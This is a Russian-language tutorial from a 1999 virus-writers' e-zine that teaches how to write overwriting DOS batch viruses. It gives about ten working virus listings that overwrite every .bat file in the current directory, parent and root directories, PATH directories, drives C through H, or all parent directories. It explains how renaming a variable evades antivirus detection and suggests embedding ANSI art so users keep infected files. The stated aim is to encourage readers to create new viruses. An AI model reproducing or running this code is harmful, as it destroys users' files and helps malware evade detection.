[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 10, Apr 1999                                          file 00A

                   Введение в написание BAT.Trivial вирусов
                               (c) by Duke/SMF
                          (special for MooN BuG #10)


                           1. В качестве вступления

     В  этой  статье  я  хочу  рассмотреть  целый  класс вирусов, незаслуженно
обойденный   вниманием   большей   части   вирусного  сообщества.  А  именно -
оверврайтовые  BAT-вирусы.  Если  оверврайтовые  COM-вирусы  уже  заняли  себе
прочное  место  в  жизни  вирмейкеров  (так  называемое семейство Trivial, где
каждый  автор  хочет  удивить  другого  краткостью  кода  или  оригинальностью
реализации),  то  BAT.Trivial  только-только  выходят из тени. Поскольку любой
вирус  имеет  право  на  существование,  я  и  поведаю о написании BAT.Trivial
вирусов.  (Те,  кто  на дух не переносит ничего слабее COM/EXE/SYS/PE/NE/BOOT/
TSR/CRYPT/MACRO-в-одном-флаконе, дальше могут не читать... :)


                        2. Немного философской теории

     Любой  деструктивный  вирус рано или поздно обнаруживает свое присутствие
на  компьютере  (иногда  самым  варварским  образом).  Причем  он  либо просто
демаскирует себя, например, удалив половину системных файлов (вот тут-то юзеры
хватаются  за F8/DrWeb/format.com - это зависит от степени образованности и от
близости  нахождения  ;) , либо уничтожает самого себя вместе со всей системой
(тоже  хорошего  мало - плодились, плодились и все подохли :( . И то, и другое
мало  способствует  увеличению  популяции  и  распространению  вируса, поэтому
редкий  деструктор  доживает  до  WildList'а  (если  он вовремя не умерит свою
деструктивную  прыть).  Троянцы  вообще не распространяются, кроме как по F5 в
нортоне :))

     Все  вышесказанное  можно отнести и ко всяческим оверврайтовым вирусам. А
вот   BAT-вирусы   имеют   еще  одно  нехорошее  свойство  :  низкую  скорость
распространения,  обусловленную  малым количеством BAT'ников на PC и редкостью
переноса BAT'ников с компьютера на компьютер.

     В  свете  этого  замечания  можно  сделать  вывод  : ни один BAT-вирус не
вызовет  даже маленькой эпидемии, если он попутно не заражает COM/EXE/BOOT/DOC
или  не  является  резидентом. Поэтому чисто-BAT-вирусы существуют либо в виде
троянов, либо в виде payload'а, либо в виде коллекционных demo-вирусов (чем мы
сейчас собственно и займемся).

     Как  бы  то  ни было, BAT-вирусы были, есть и будут писаться вирмейкерами
:)) Значит надо уделить этим вирусам немного внимания...


                      3. С чего начинаются BAT.Trivial ?

     Хороший  вопрос ! Конечно же с поиска жертв и копирования поверх них (как
и  любой  другой Trivial :). Надеюсь здесь все знакомы с основами DOS-команд ?
(Я не в счет :)) Если нет, то сперва ознакомьтесь !

     Как выглядит простой BAT.Trivial вирус, не поражающий файл AUTOEXEC.BAT ?
(Опережая  события скажу, что поскольку здесь используется команда COPY, то не
нужно  оставлять  перевод строки в конце последней строки вируса - оптимизация
размера на 2 байта ! :)

===== ex_1.bat begin =====
@echo off
for %%b in (*.bat) do if not %%b==AUTOEXEC.BAT copy %0 %%b>nul
echo on
===== ex_1.bat end   =====

     Здесь  стоит  обратить  внимание  на то, что найденные имена возвращаются
DOS'ом,  преобразованные  к  верхнему  регистру,  так  что всякие извраты типа
aUtoExeC.bAt здесь не прокатят.

     Следует  раз  и  навсегда  запомнить,  что  поражение  файла AUTOEXEC.BAT
никогда  не  приносит  выгоды  BAT-вирусу  (хоть  паразиту,  хоть оверврайту),
поскольку  вирус  все равно не сможет из него распространяться. Все нормальные
BAT'ники  выдают в нулевом параметре %0 своё имя, а AUTOEXEC.BAT при начальной
загрузке  ничего  в  нем  не возвращает. (А казалось все так заманчиво - вирус
стартовал  бы  при  каждом  включении  компиютера... Размечтались !!! Однако в
паразитическом вирусе это можно использовать, введя новую переменную окружения
и... Что-то я увлекся и отошел от темы !).

     Есть  и другой вариант: поражать все подряд, но проверять, что у нас в %0
.  (У  нас  и так очень опасный вирус. Подумаешь - еще и AUTOEXEC.BAT удалит !
По крайней мере это научит пострадавших делать резервное копирование :))

===== ex_2.bat begin =====
@echo off
for %%b in (*.bat) do if not "%0==" copy %0 %%b>nul
echo on
===== ex_2.bat end   =====

     Так  получается  намного  короче  и имеет смысл использовать этот прием в
паразитических  BAT-вирусах.  Использование символа " (или какого другого) при
сравнении в данном случае обязательно, иначе мы вылетим в трубу...

     Пойдем  по  пути  минимизации  кода  вируса,  стараясь  не  ухудшать  его
качество.  Уберем  совсем проверку на AUTOEXEC.BAT (хуже уже и так некуда :) и
получим вирус в 57 байт :

===== ex_3.bat begin =====
@echo off
for %%b in (*.bat) do copy %0 %%b>nul
echo on
===== ex_3.bat end   =====

     А  что  будет,  если  запустить  описанные вирусы? Получим на экране кучу
сообщений,  которые  нами  не  планировались :(( Как от этого избавиться будет
сказано чуть ниже.


                       4. Оптимизируем BAT.Small вирус

     Не  так  давно  программа AVP стала детектировать вирус BAT.Small.a . Мне
стало  интересно  -  чего  же  там  такого  Small  и  неужели  он  короче моих
BAT-вирусов.  И  мне  повезло  -  на  одном  из VX-сайтов я скачал этот вирус.
Поглядел  я  в  него,  и  понял,  что  ничего  хорошего  в нем нет, простейший
overwriting вирус на BAT-языке. Фу...

     Но  раз  прецедент  создан,  будем  и мы писать BAT.Small-вирусы. Правда,
повыше качеством :)

     Я  не  собираюсь публиковать в журнале вирус BAT.Small.a . Написал его не
я,  а  MiDeZ,  и  нечего  публиковать  чужие  работы без ведома автора. Зато я
замечу, что стоит исправить в вирусе имя переменной с "m" на другую букву, как
вирус  перестает  детектироваться  AVP  :))  [  Да,  BAT-эвристикой в AVP и не
пахнет...  Сколько  можно повторять, что надо детектировать вирус не по именам
переменных,  а  по  содержащимся  командам  : переправить переменные ничего не
стоит ! ] Вот этот вариант в 57 байт (пораженный файл - 58 байт) :

===== ex_4.bat begin =====
@echo off
for %%b in (*.bat) do copy %0.bat+%0 %%b>nul

===== ex_4.bat end   =====

     А  теперь  запустите  этот  файл.  Чего  там  вам DOS сказал? "Содержимое
конечного  файла  утрачено  до  копирования" ? А вы чего хотели, надо было мой
туториал читать ! Никакие "@echo off" и ">nul" вам тут не помогут...

     И вообще - зачем нужна возня с "%0.bat+%0" ? Лишние байтики сжирать (ведь
из-за этого добавляется символ 1Ah в хвосте файла) ? Ну уж нет ! Достаточно из
всего этого многообразия оставить только "%0". Работать будет не хуже, а длина
меньше.  Да  еще надо убрать идиотский перевод строки в конце файла - экономия
двух байт! Получили вирус длиной 48 байт :

===== ex_5.bat begin =====
@echo off
for %%b in (*.bat) do copy %0 %%b>nul
===== ex_6.bat end   =====

     Теперь  при  запуске  вируса  DOS  сообщает,  что  "Файл  не  может  быть
скопирован  поверх  самого  себя".  Тоже мне, нашел чем удивить :( Но я не для
этого  кашу  заварил - раз уж пишем вирус, так надо писать качественный вирус.
Убьем  одним махом двух зайцев: избавимся от этого сообщения и сократим длину.
Опять  вспоминаем  мои  советы :)) Меняем "@echo off" на "@ctty nul" и убираем
">nul" - 4 байта ! Получили вирус длиной 44 байта (ex_3.bat) :

===== ex_6.bat begin =====
@ctty nul
for %%b in (*.bat) do copy %0 %%b
===== ex_6.bat end   =====

     Итак,  мы  оптимизировали  вирус  BAT.Small.a  на 13 байт + избавились от
идиотских  надписей.  В  дальнейшем  я настоятельно рекомендую вирусописателям
более  тщательно  тестировать  свои  поделки  на  наличие  багов и возможность
оптимизации. Этим вы сбережете нервы пользователей вашего ПО :))


                      5. Немного о вирусе BAT.Trivial.a

     Еще  одна  жертва  AVP  -  вирус  BAT.Trivial.a  .  К  счастью, AVP и его
детектирует  по  имени  переменной  :)  К  несчастью,  и  он  не оправдал моих
ожиданий  - по прежнему есть простор для оптимизации. Да и размер его ровно 57
байт.  Какое-то  роковое  число - никто до меня не смог через него переступить
;)) А это немного подправленный мной и не детектируемый AVP вариант вируса :

===== ex_7.bat begin =====
@ctty nul
for %%b in (*.bat) do copy /y %0 %%b
ctty con
===== ex_7.bat end   =====

     Чего  тут  можно  выкинуть  ? Как мы уже убедились ранее, можно прекрасно
жить  без  строки  "ctty  con"  -  раз  вирус  оверврайтовый, а не препендовый
(извиняюсь  за  выражение  ;)  то  для вируса работы эта строка излишняя. Да и
состояние ctty не играет роли для запущенных впоследствии файлов !
     Ключик  "/y" вещь конечно хорошая, но... опять не для нас. Честно говоря,
не  встречал  я  еще  ни  одного  компьютера,  на  котором была бы установлена
переменная окружения COPYCMD. Эти времена уже давно канули в лету (периода DOS
3.0  :)  и  в  современных версиях DOS эта муть имеется только для поддержания
традиций  и преемственности поколений 8-) К тому же при вызове команды COPY из
BAT'ника  запрос  на перезапись не задается и все идет само-собой как по маслу
:-P
     Получается,  что  лучше  (в смысле проще ;) вируса ex_6.bat ничего еще не
придумали...  Я  думаю,  что  это  самый  мелкий  оверврайтовый  BAT-вирус, не
выводящий на экран посторонних сообщений.


                          6. Плодовитость и выживание

     Надо  как-то попытаться исправить недостатки BAT-вирусов, а именно низкую
скорость распространения. Как ?
     Один  из  способов  - стараться поразить как можно больше директорий. Для
этого  в  списке  поиска  через  пробел  надо  указать много-много директорий.
Подумайте  над тем, какие директории встречаются на большинстве компьютеров, и
напишите  их.  Примерный список директорий может выглядеть так (поскольку диск
C: есть у всех :) :
     c:\dos
     c:\win95
     c:\windows
Так выглядит поиск в :
     ..\*.bat - надкаталоге
     \*.bat   - корневом каталоге текущего диска
     %path%   - каталогах переменной PATH
Применяя эти знания можно написать плодовитого монстра :

===== ex_8.bat begin =====
@ctty nul
for %%b in (*.bat ..\*.bat \*.bat %path%\*.bat) do copy %0 %%b
===== ex_8.bat end   =====

Можно перебирать диски :

===== ex_9.bat begin =====
@ctty nul
if not "%1==" goto End
for %%a in (c d e f g h) do call %0 %%a
exit
:End
for %%b in (%1:\*.bat) do copy %0 %%b
===== ex_9.bat end   =====

     А  можно вспомнить старый добрый метод размножения Search-вирусов - метод
Dot-Dot.  Он  вполне  применим  и  для  BAT-вирусов. При использовании Dot-Dot
поражаются все надкаталоги до самого корня.

===== ex_a.bat start =====
@ctty nul
:Dot
for %%b in (%NEW%*.bat) do copy %0 %%b
set NEW=..\%NEW%
copy %0 %NEW%%0
if not exist %NEW%%0 exit
del %NEW%%0
goto Dot
===== ex_a.bat end   =====

     А  как же заставить юзера сохранить файл с вирусом, или (еще лучше) чтобы
этот  файл пользовался у юзеров популярностью? Просто надо встроить в BAT-файл
ANSI-рисунок или демку :))


                       7. Несколько слов напоследок...

     Ну  вот  пожалуй  и все... Основные идеи BAT.Trivial вирусов я рассказал.
Теперь  дело  уже  за читателями. Если вы думаете после прочтения этой статьи,
что  ничего  нового  в  области  BAT.Trivial  вирусов  придумать нельзя, то вы
глубоко  заблуждаетесь!  Статья  написана  именно  для того, чтобы подстегнуть
воображение читателей и направить его на создание новых BAT-вирусов.

     Стоит  напомнить, что среди Trivial-вирусов есть так называемое семейство
Trojan.STDOUT  -  вирусы  выбрасывающие  свой  код на консоль в надежде, что в
командной  строке  стоит  перенаправление  вывода. Есть подобные звери и среди
BAT-вирусов:  "copy  %0  %1"  и "type %0>%1" - они нуждаются в одном параметре
командной строки и занимают по 10 байт.

   Хочу сказать СПАСИБО следующим людям :
 * MiDeZ, KnowDeth и другим - за то, что они не обходят batch своим вниманием
 * RedArc                   - за публикацию этой статьи ;)
 * тебе, читатель           - за то, что ты вытерпел этот бред до конца :))


